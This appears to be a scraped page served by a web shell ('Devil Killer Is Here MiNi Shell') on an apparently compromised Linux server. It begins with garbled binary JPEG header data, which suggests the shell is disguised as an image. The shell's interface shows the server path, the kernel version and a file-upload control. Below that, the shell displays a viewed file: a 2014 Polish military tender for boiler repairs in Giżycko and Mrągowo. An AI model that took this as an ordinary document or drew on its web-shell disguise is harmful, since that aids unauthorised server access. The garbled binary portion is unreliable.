JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140825/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140825/181443-N-2014.html

<p class="kh_header"><b>Giżycko: ROBOTY BUDOWLANE W ZAKRESIE KONSERWACJI URZĄDZEŃ KOTŁOWNI POLEGAJĄCE NA WYMIANIE POJEDYNCZYCH ELEMENTÓW KOTŁÓW I OSPRZĘTU 
W KOTŁOWNIACH NA TERENIE KOMPLEKSÓW WOJSKOWYCH W GIŻYCKU 
I MRĄGOWIE</b><br>
<b>Numer ogłoszenia: 181443 - 2014; data zamieszczenia: 25.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 4352 , ul. Nowowiejska 20, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 87 429 46 02, faks 87 429 46 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.24wog.wp.mil.pl; www.bip.mon.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROBOTY BUDOWLANE W ZAKRESIE KONSERWACJI URZĄDZEŃ KOTŁOWNI POLEGAJĄCE NA WYMIANIE POJEDYNCZYCH ELEMENTÓW KOTŁÓW I OSPRZĘTU 
W KOTŁOWNIACH NA TERENIE KOMPLEKSÓW WOJSKOWYCH W GIŻYCKU 
I MRĄGOWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	 REMONT KOTŁA PAROWEGO ECA-IV NR 4 W BUDYNKU NR 1 JW. 3797 W GIŻYCKU AL. WOJSKA POLSKIEGO 21
1.1.	Odłączenie i podłączenie kotła żeliwnego parowego ECA-IV.
1.2.	Oczyszczenie elementu kotła żeliwnego - półczłonu.
1.3.	Demontaż i ponowny montaż płaszcza otulczego z blachy stalowej do kotła żeliwnego ECAIV (pochodzących z rozbiórki - bez kosztu materiału).
1.4.	 Demontaż i ponowny montaż płyty przedrusztowej (bez kosztu materiału).
1.5.	Demontaż i ponowny montaż płyty zarusztowej (bez kosztu materiału).
1.6.	Demontaż i ponowny montaż drzwiczek kotła żeliwnego (bez kosztu materiału).
1.7.	Demontaż i ponowny montaż półczłonów kotła żeliwnego - do wyceny przyjąć wartość 5szt nowych półczłonów oraz 6 szt. z rozbiórki (bez kosztu materiału).
1.8.	Wykonanie próby szczelności kotła parowego ECA IV.
1.9.	Przekazanie kotłów do Wojskowego Dozoru Technicznego celem dopuszczenia ich do eksploatacji.

2.	REMONT KOTŁA PAROWEGO ECA-IV NR 1, 2, 5, 6 i 7 W BUDYNKU NR 3 
   JW. 3797 w GIŻYCKU AL. WOJSKA POLSKIEGO 21
2.1.	Odłączenie i podłączenie kotła żeliwnego parowego ECA-IV.
2.2.	Demontaż i ponowny montaż płaszcza otulczego z blachy stalowej do kotła żeliwnego ECAIV (pochodzących z rozbiórki - bez kosztu materiału). 
2.3.	Demontaż i ponowny montaż płyty przedrusztowej (bez kosztu materiału).
2.4.	Demontaż i ponowny montaż płyty zarusztowej (bez kosztu materiału).
2.5.	Demontaż i ponowny montaż płyty zamykającej dolnej i górnej do kotłów Eco-IV (bez kosztu materiału).
2.6.	Demontaż i ponowny montaż drzwiczek kotła żeliwnego (bez kosztu materiału).
2.7.	Demontaż i ponowny montaż półczłonów kotła żeliwnego - do wyceny przyjąć wartość 35szt nowych półczłonów ( półczłon narożny tylny prawy- 1szt,  półczłon narożny tylny lewy- 1szt, półczłon środkowy- 32szt, półczłon narożny przedni prawy - 1szt) oraz 30 szt. pochodzących z rozbiórki (bez kosztu materiału).
2.8.	Wykonanie próby szczelności kotła parowego ECA IV.
2.9.	Demontaż rurociągu stalowego o połączeniach spawanych fi 15mm.
2.10.	Demontaż zaworu zaporowego i redukcyjnego o połączeniu kołnierzowym Fi 100mm.
2.11.	Demontaż zaworu zaporowego i redukcyjnego o połączeniu kołnierzowym Fi 150mm.
2.12.	Demontaż pompy odśrodkowej z silnikiem do 100kg.
2.13.	Rurociągi stalowe ocynkowane o połączeniach gwintowanych na ścianach w budynkach niemieszkalnych fi 25mm.
2.14.	Rurociągi stalowe o połączeniach spawanych na ścianach w budynkach fi 25mm.
2.15.	Zawór kołnierzowy kulowy 1,6MPa Fi 100mm - instalacja gorącej wody.
2.16.	Zawór kołnierzowy kulowy  1,6MPa Fi 150mm - instalacja parowa, ciśnienie pary 0,07 MPa.
2.17.	Pompy wirowe odśrodkowe (jedno- i wielostopniowe) do zasilania kotłów oraz obiegowe do wody gorącej, masa 0.05t - parametry pompy: typ pompy 50PJM 160, wydajność- 12 m 3/h, wysokość podnoszenia 31 m. sł. wody, moc silnika 2,2KW, obroty 2900 / min.
2.18.	Wykonanie połączeń przewodów w puszkach i odgałęźnikach n.t. i p.t., bez zadławienia przewodów, przewód pojedynczy lub wtynkowy, przekrój żył do 2,5mm2, 3 odgałęzienia.
2.19.	Odmulacze z rur stalowych, króćce przyłączne Fi 80mm - filtroodmulacz magnetyczny DN 80mm.
2.20.	Wymiana filtra siatkowego o połączeniach kołnierzowych Fi 50mm.
2.21.	Płukanie mechaniczne i czyszczenie zasobnika c.w.u. o pojemności 3000 l .
2.22.	Płukanie chemiczne kotłów Eca-IV - 7szt oraz część instalacji technologicznej, pojemność instalacji technologicznej -  0,52m3,  pojemność kotłów - 6,545m3.
2.23.	Wykonanie próby szczelności kotłów parowych ECA IV z przekazaniem ich do Wojskowego Dozoru Technicznego celem dopuszczenia do eksploatacji.

3.	REMONT KOTŁA PAROWEGO ECA-iv NR 2 W BUDYNKU NR 16 JW. 3797
    W GIŻYCKU AL. WOJSKA POLSKIEGO 21
3.1.	Odłączenie i podłączenie kotła żeliwnego parowego ECA-IV.
3.2.	Oczyszczenie czopucha kotła o długości do 4m.
3.3.	Oczyszczenie elementu kotła żeliwnego - półczłonu.
3.4.	Demontaż i ponowny montaż płyty przedrusztowej (bez kosztu materiału).
3.5.	Demontaż i ponowny montaż drzwiczek kotła żeliwnego (bez kosztu materiału).
3.6.	Demontaż i ponowny montaż półczłonów kotła żeliwnego - do wyceny przyjąć wartość 2szt nowych półczłonów (półczłon środkowy - 2szt) oraz 6 szt. z rozbiórki (bez kosztu materiału).
3.7.	Wykonanie próby szczelności kotłów parowych ECA IV z przekazaniem ich do Wojskowego Dozoru Technicznego celem dopuszczenia do eksploatacji.

4.	REMONT KOTŁA PAROWEGO ECA-IV NR 4 W BUDYNKU NR 1 JW. 4352 
    W GIŻYCKU UL. MONIUSZKI 7
4.1.	Odłączenie i podłączenie kotła żeliwnego parowego ECA-IV.
4.2.	Demontaż i ponowny montaż płaszcza otulczego z blachy stalowej do kotła żeliwnego ECAIV (pochodzących z rozbiórki - bez kosztu materiału).
4.3.	 Demontaż i ponowny montaż płyty przedrusztowej (bez kosztu materiału).
4.4.	Demontaż i ponowny montaż drzwiczek kotła żeliwnego (bez kosztu materiału).
4.5.	Oczyszczenie czopucha kotła o długości do 4m.
4.6.	Oczyszczenie elementu kotła żeliwnego - półczłonu.
4.7.	Demontaż i ponowny montaż półczłonów kotła żeliwnego - do wyceny przyjąć wartość 3szt nowych półczłonów (półczłon środkowy - 3szt) oraz 1 szt. z rozbiórki (bez kosztu materiału).
4.8.	Wykonanie próby szczelności kotłów parowych ECA IV z przekazaniem ich do Wojskowego Dozoru Technicznego celem dopuszczenia do eksploatacji

5.	REMONT KOTŁA PAROWEGO ECA-IV NR 3 W BUDYNKU NR 9 JW. 4222
    W GIŻYCKU UL. MONIUSZKI 7
5.1.	Odłączenie i podłączenie kotła żeliwnego parowego ECA-IV.
5.2.	Demontaż i ponowny montaż płaszcza otulczego z blachy stalowej do kotła żeliwnego ECAIV (pochodzących z rozbiórki - bez kosztu materiału). 
5.3.	Oczyszczenie czopucha kotła o długości do4m.
5.4.	Oczyszczenie elementu kotła żeliwnego - półczłonu.
5.5.	Demontaż i ponowny montaż półczłonów kotła żeliwnego - do wyceny przyjąć wartość 2szt nowych półczłonów (półczłon środkowy -1szt, półczłon narożny tylny lewy 01szt) oraz 11 szt. z rozbiórki (bez kosztu materiału).
5.6.	Wykonanie próby szczelności kotłów parowych ECA IV z przekazaniem ich do Wojskowego Dozoru Technicznego celem dopuszczenia do eksploatacji.

6.	REMONT KOTŁA WODNEGO W BUDYNKU NR 20 JW. 4352 W GIŻYCKU 
    UL. NOWOWIEJSKA 20
6.1.	Odłączenie i podłączenie kotła żeliwnego wodnego ECA.
6.2.	Demontaż i ponowny montaż płaszcza otulczego z blachy stalowej do kotła żeliwnego ECA (pochodzących z rozbiórki - bez kosztu materiału). 
6.3.	Demontaż i ponowny montaż płyty przedrusztowej (bez kosztu materiału).
6.4.	Oczyszczenie czopucha kotła o długości do 4m.
6.5.	Demontaż i ponowny montaż drzwiczek paleniskowych lub popielnikowych kotła żeliwnego (bez kosztu materiału).
6.6.	Demontaż i ponowny montaż półczłonów kotła żeliwnego - do wyceny przyjąć wartość 2szt nowych półczłonów (półczłon środkowy -1szt, półczłon narożny -1szt).
6.7.	Wykonanie próby szczelności kotłów wodnych ECA z przekazaniem ich do Wojskowego Dozoru Technicznego celem dopuszczenia do eksploatacji.

7.	REMONT KOTŁA WODNEGO NR 1, 2, 3, 4 i 5 W BUDYNKU NR 35 JW. 4352 
    W GIŻYCKU UL. NOWOWIEJSKA 20
7.1.	Odłączenie i podłączenie kotła żeliwnego wodnego ECA.
7.2.	Odłączenie i podłączenie kotła żeliwnego parowego ECA.
7.3.	Demontaż i ponowny montaż płaszcza otulczego z blachy stalowej do kotła żeliwnego ECAIV (pochodzących z rozbiórki - bez kosztu materiału). 
7.4.	Demontaż i montaż osprzętu kotła, wodowskazu ze szkłem refleksyjnym lub rurki szklanej (bez ceny wodowskazu).
7.5.	Demontaż i ponowny montaż drzwiczek paleniskowych lub popielnikowych kotła żeliwnego (bez kosztu materiału).
7.6.	Oczyszczenie czopucha kotła o długości do 4m.
7.7.	Demontaż i ponowny montaż półczłonów kotła żeliwnego - do wyceny przyjąć wartość 9szt nowych półczłonów ( półczłon środkowy- 9szt) oraz 41 szt. pochodzących z rozbiórki (bez kosztu materiału).
7.8.	Wymiana półczłonu kotła żeliwnego: ECA IV - do wyceny przyjąć półczłon środkowy -1szt i półczłon narożny przedni lewy -1szt.
7.9.	Oczyszczenie elementu kotła żeliwnego - półczłonu.
7.10.	Wykonanie próby szczelności kotła parowego nr 1, 2 i 3 ECA IV z przekazaniem ich do Wojskowego Dozoru Technicznego celem dopuszczenia do eksploatacji.
7.11.	Wykonanie próby szczelności kotła nr 4 i 5.
7.12.	Demontaż zaworu zaporowego i redukcyjnego o połączeniu kołnierzowym Fi 65-80mm.
7.13.	Zawór kołnierzowy kulowy 1,6MPa Fi 65mm.
7.14.	Filtroodmulacz magnetyczny kołnierzowe Fi 65mm.
7.15.	Izolacja wełną mineralną luzem, pod blachą ocynkowaną - zbiorniki - ściany boczne, grubość izolacji 100-120mm, zbiornik do Fi 2220mm.
7.16.	Izolacja otulinami z wełny mineralnej, rurociągi, 1 warstwa izolacji, grubość 40mm, rurociąg Fi 42-63mm - płaszcz z foli aluminiowej.
7.17.	Izolacja otulinami z wełny mineralnej, rurociągi, 1 warstwa izolacji, grubość 50mm, rurociąg Fi 76-114mm - płaszcz z foli aluminiowej.
7.18.	Izolacja otulinami z wełny mineralnej, rurociągi, 1 warstwa izolacji, grubość 60mm, rurociąg Fi 113-159mm - płaszcz z foli aluminiowej.
7.19.	Izolacja otulinami z wełny mineralnej, rurociągi, 1 warstwa izolacji, grubość 60mm, rurociąg Fi 219-368mm - płaszcz z foli aluminiowej.




8.	REMONT KOTŁA W BUDYNKU NR 125 W WOJSKOWYM OŚRODKU 
    SZKOLENIOWO-KONDYCYJNYM MRAGOWO
8.1.	Demontaż pompy odśrodkowej z silnikiem do 100kg.
8.2.	Montaż pompy typu S 11, Q - 10  l/min  , H- 12,5 m. sł. w., N - 0,16 KW.
8.3.	Wymiana wężownicy do wymiennika WP6/6, wężownica nr 6/2, F - 4,7 m2 w pojemnościowym podgrzewaczu wody, pojemność do 2000dm3 przez firmę posiadającą uprawnienia do naprawy wężownic.
8.4.	Próby węzłów cieplnych, o ogólnej powierzchni ogrzewalnej wymienników do 8m2 - zgłoszenie  do Wojskowego Dozoru Technicznego celem uzyskania decyzji dopuszczającej  do  eksploatację wymiennika c.w.u. typu WP 6/6.
8.5.	Wymiana zaworu zaporowego Fi 25mm, figury 215.
8.6.	Wymiana zaworu zwrotnego kołnierzowego Fi 50mm, figury 302.
8.7.	Wymiana elektrycznego regulatora dwustawnego typu  ERD- 1/83.
8.8.	Wymiana osprzętu kotła, wodowskazu ze szkłem refleksyjnym  do kotłów parowych PPW-840/III, długość wodowskazu 210 mm.
8.9.	Wymiana koła wirnika o figurze L2 oraz P2 wentylatorów WWOax 31,5.
8.10.	Naprawa leja zasypowego do kotła nr 1 z blachy czarnej o gr. 4 mm - 8m3.
8.11.	Izolacja otulinami z wełny mineralnej, rurociągi, 1 warstwa izolacji, grubość 30mm, rurociąg Fi 42-63mm.

9.	REMONT KOTŁA W BUDYNKU NR 26 JW. 3797 W GIŻYCKU AL. 1 Maja 11
9.1.	Demontaż rurociągu stalowego ocynkowanego Fi 50mm.
9.2.	Demontaż rurociągu stalowego o połączeniach spawanych Fi 40mm.
9.3.	Demontaż rurociągu stalowego o połączeniach spawanych Fi 50mm.
9.4.	Demontaż pompy odśrodkowej z silnikiem do 100kg.
9.5.	Rurociągi stalowe ocynkowane o połączeniach gwintowanych, na ścianach w budynkach niemieszkalnych fi 50mm.
9.6.	Rurociągi stalowe o połączeniach spawanych na ścianach w budynkach  
fi 40mm.
9.7.	Rozdzielacze do kotłów i instalacji c.o.,  fi 50mm - L- 1,7m, L- 1,3m.
9.8.	Zawór wodny przelotowy prosty mosiężny Fi 40mm - zawór kulowy DN 40mm.
9.9.	Zawór zwrotny przelotowy c.o. M3003 żeliwny ocynkowany Fi 40mm.
9.10.	Zawór wodny przelotowy prosty mosiężny Fi 50mm - zawór kulowy DN 50mm.
9.11.	Montaż pompy SK 6.01. 11 - wysokość podnoszenia 12 m. sł. w., wydajność 12 m 3,  moc silnika  2,1  KW.
9.12.	Montaż manometru wraz z wykonaniem tulei.
9.13.	Czyszczenie przez szczotkowanie ręcznie do trzeciego stopnia czystości rurociągi o fi. zewn. do 57mm.
9.14.	Malowanie pędzlem farby do gruntowania miniowe rurociągi o fi. zewn. do 
57mm.
9.15.	Naprawa koleby: wymiana blachy stalowej gr. 3mm  o wym.130 cmx130 cm i głębokości 70cm.
9.16.	Zsypy popiołów i żużla, zsypy węgla zasypy lejów żużlowych, zsypnie węgla do rusztów, zasobniki węgla, o masie do 1,0t- zsyp do żużla z blachy stalowej gr. 4 mm o wym. 70cmx70 cmx 44 cm - 3 szt.
9.17.	Wykonanie pojemników na pył węglowy.

10.  Warunki realizacji zadania:
10.1.	Zamawiający przewiduje możliwość dokonania wizji lokalnej miejsca inwestycji w terminie od 26.08.2014r. do 01.09.2014r. Wykonawca zobowiązany jest do wcześniejszego uzgodnienia terminu wizji lokalnej 
z Kierownikiem Sekcji Obsługi Infrastruktury Panem Bogusławem BOROWIEC tel. (87) 429-49-81 lub (87) 429-47-74 bądź z z-cą Panem Zdzisławem POMICHOWSKIM. Koszt takiej wizyty ponosi Wykonawca.
10.2.	Zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym na dwa dni przed podpisaniem umowy dostarczył do Kierownika Wydziału Infrastruktury przy ul. Moniuszki 7 w Giżycku;
10.2.1.	trzy egzemplarze kosztorysu ofertowego, sporządzonego metodą szczegółową wraz z zestawieniem cen jednostkowych materiałów 
i sprzętu sporządzone wg założeń do kosztorysowania (załącznik nr 8 do SIWZ) na podstawie przedmiarów, które będą stanowiły załącznik do umowy. Niniejszy kosztorys ofertowy będzie stanowił podstawę obliczenia wynagrodzenia Wykonawcy należnego mu z tytułu wykonania części przedmiotu zamówienia w przypadku przerwania realizacji zamówienia z winy Wykonawcy, bądź z przyczyn leżących po stronie Zamawiającego. 
10.3.	Zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania umowy ustanowił kierownika budowy (robót) posiadającego uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie (w rozumieniu ustawy z dnia 7 lipca 1994 roku - Prawo budowlane) oraz dostarczył dowód jego przynależności do Izby Inżynierów Budownictwa.
10.4.	Zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania przedstawił uprawnienia Urzędu Dozoru Technicznego do naprawy kotłów parowych i wodnych.  
10.5.	Realizacja robót: w godzinach 700-1500 (istnieje możliwość pracy do godziny 1800 w dniach poniedziałek- piątek oraz do godz.1500 w sobotę po uzgodnieniu z Dowódcą Jednostki).
10.6.	Roboty będą prowadzone w czynnym zakładzie. 
10.7.	Wykonawca robót (kierownik budowy) w pełni odpowiada za bezpieczeństwo i higienę pracy w miejscu realizacji robót, oraz za zachowanie bezpieczeństwa pożarowego.
10.8.	Wszystkie prace rozbiórkowe i montażowe Wykonawca winien wykonywać 
z zachowaniem wymogów bezpieczeństwa w odniesieniu do ludzi i mienia.
10.9.	Wykonawca wyznaczy koordynatora do spraw BHP, który będzie współpracował z Inspektorem BHP wskazanym przez Dowódcę JW. 4352.
10.10.	Wykonawca w ciągu 3 dni od podpisania umowy przekaże Inspektorowi BHP wskazanemu przez Dowódcę JW. 4352, oświadczenie o treści zgodnej 
z załącznikiem nr 3 do umowy (załącznik nr 10 do SIWZ) wraz z wykazem pracowników realizujących zadanie objęte niniejsza umową.
10.11.	Wykonawca zobowiązany będzie do pokrycia kosztów poboru energii elektrycznej, poboru wody i odprowadzenia ścieków związanych z realizacją robót i potrzebami socjalnymi. Sposób rozliczenia został określony we wzorze umowy.
10.12.	Zbiór wymagań szczegółowych dotyczących organizacji robót, standardu 
i jakości wykonania, właściwości zastosowania wyrobów budowlanych oraz metod i sposobu oceny jakości wykonania zleconych prac określono 
w Specyfikacji Technicznej wykonania i odbioru robót budowlanych. 
10.13.	W przypadku uszkodzenia systemów alarmowych, p.poż, sieci jawnych, niejawnych, sieci telefonicznej, elektrycznej, komputerowej, wodociągowej, kanalizacyjnej, ciepłowniczej, gazowej itp. Wykonawca usunie awarię w ciągu 48 godzin od zdarzenia zgodnie z obowiązującymi Normami. W przypadku nie usunięcia awarii w wyznaczonym terminie Zamawiający zleci wykonanie usunięcia awarii osobie trzeciej na koszt Wykonawcy.
10.14.	Zamawiający będzie wymagał, aby Wykonawca, którego oferta zostanie uznana za najkorzystniejszą w przedmiotowym postępowaniu przetargowym najpóźniej w dniu podpisania umowy dokonał ubezpieczenia budowy na kwotę nie mniejszą niż: cena za realizację niniejszego zamówienia zaproponowana w ofercie. Dokument potwierdzający ubezpieczenie Wykonawca przedstawi Zamawiającemu najpóźniej w dniu podpisania umowy.
10.15.	Wykonawca odpowiedzialny jest za całokształt, w tym przebieg oraz terminowe wykonanie zamówienia w okresie wykonywania umowy. 
10.16.	Wykonawca odpowiedzialny jest, za jakość robót, ich zgodność 
z dokumentacją techniczną. Wymagana jest należyta staranność przy realizacji zamówienia. 
10.17.	Wykonawca ponosi odpowiedzialność za szkody wyrządzone w mieniu oraz na rzecz osób trzecich, wyrządzone w trakcie realizacji obowiązków wynikających z treści zawartej umowy.
11.	Lokalizacja robót:
Roboty realizowane będą na terenie: Jednostki Wojskowej Nr 4352 w Giżycku przy ul. Nowowiejskiej 20, Jednostki Wojskowej Nr 3797 w Giżycku przy 
ul. Wojska Polskiego 21 oraz ul. 1-go Maja 11, Jednostki Wojskowej Nr 4222 
w Giżycku przy ul. Moniuszki 7, Wojskowego Ośrodka Szkoleniowo-Kondycyjnego w Mrągowie. Obowiązkiem Wykonawcy wobec Pełnomocników Dowódców (ww jednostek) ds. Ochrony Informacji Niejawnych jest, przed rozpoczęciem robót dostarczenie listy pracowników wraz z numerami dowodów tożsamości oraz nr rejestracyjne i marki pojazdów zabezpieczających prace..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium zgodnie z art. 45 ustawy.
Przystępując do postępowania każdy z Wykonawców zobowiązany jest do wniesienia wadium w wysokości 5 000,00 zł. słownie pięć tysięcy złotych.Wadium musi być wniesione przed upływem terminu składania ofert.Wadium może być wnoszone w jednej lub w kilku następujących formach pieniądzu, poręczeniach bankowych lub poręczeniach Spółdzielczej Kasy Oszczędnościowo Kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. Nr 109, poz. 1158, z późn. zm. Wadium wniesione w pieniądzu Wykonawca wpłaca na rachunek bankowy zamawiającego prowadzony przez NBP OO Olsztyn 51 1010 1397 0020 1713 9120 1000 z dopiskiem wadium w post. nr 872014  konserwacja urządzeń kotłowni. Do oferty należy dołączyć kserokopię dowodu bankowego potwierdzającego wniesienie wadium w pieniądzu. W przypadku realizowania przez Wykonawcę rozliczeń bankowych w formie elektronicznej do oferty należy załączyć potwierdzenie wykonania operacji bankowej w formie kserokopii wydruku operacji. Zarówno kserokopia dowodu bankowego jak i dowodu pochodzącego z systemu elektronicznych rozliczeń, wymaga potwierdzenia przez Wykonawcę za zgodność z oryginałem. Zwrot i zatrzymanie wadium. 
Zamawiający zwraca niezwłocznie wadium, jeżeli dokona wyboru oferty najkorzystniejszej, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem ust. 4a., unieważni postępowanie o udzielenie zamówienia. Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust 3 ustawy, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictwa, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana, odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, zawarcie umowy w 